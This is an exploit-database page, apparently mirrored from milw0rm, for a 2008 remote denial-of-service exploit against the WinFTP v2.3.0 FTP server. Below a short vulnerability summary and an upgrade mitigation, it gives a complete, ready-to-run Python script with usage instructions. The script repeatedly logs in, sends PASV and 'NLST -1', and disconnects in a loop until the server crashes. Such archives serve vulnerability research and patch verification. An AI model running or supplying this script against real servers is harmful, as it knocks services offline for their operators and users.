header-logo
Suggest Exploit
vendor:
WinFTP
by:
(x)dmnt
7.5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: WinFTP
Affected Version From: 2.3.2000
Affected Version To: 2.3.2000
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

WinFTP v2.3.0 DoS exploit

WinFTP v2.3.0 is vulnerable to a Denial of Service attack when an attacker attempts to send data. The exploit code creates a socket connection to the target host on port 21, sends a USER command with the supplied username, a PASS command with the supplied password, a PASV command, a NLST -1 command, and a QUIT command. The socket is then closed.

Mitigation:

Upgrade to the latest version of WinFTP.
Source

Exploit-DB raw data:

# WinFTP v2.3.0 DoS exploit
# WinFTP URL - http://www.wftpserver.com/
# DoS'ed when try to send data
# (x)dmnt
# -*- coding: windows-1252 -*-

import socket
import time
import sys

PORT = 21

def help_info():
    print ("Usage: winftp <host> <login> <password>\n")
    print ("Note: anonymous is enought\n")

def conn(hostname, username, passwd):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, PORT))
    except:
        print ("[+] Done!")
        sys.exit(1)

    r=sock.recv(1024)
    print "[+] " + r
    sock.send("USER %s\n" %username)
    sock.send("PASS %s\n" %passwd)
    sock.send("PASV\n")
    sock.send("NLST -1\n")
    sock.send("QUIT\n")
    sock.close()


print ("\n[WinFTP v2.3.0 remote DoS exploit]")
print ("[(x)dmnt 2008 without any clue :)]\n\n")

if len(sys.argv) <> 4:
    help_info()
    sys.exit(1)

else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try: sock.connect((hostname, PORT))
    except:
        print ("[-] Connection error!")
        sock.close()
        sys.exit(1)

    while passwd:
        conn(hostname, username, passwd)
        time.sleep(0.2)

    sys.exit(0)

# milw0rm.com [2008-10-09]

Navigation

Suggest Exploit

Services By CQR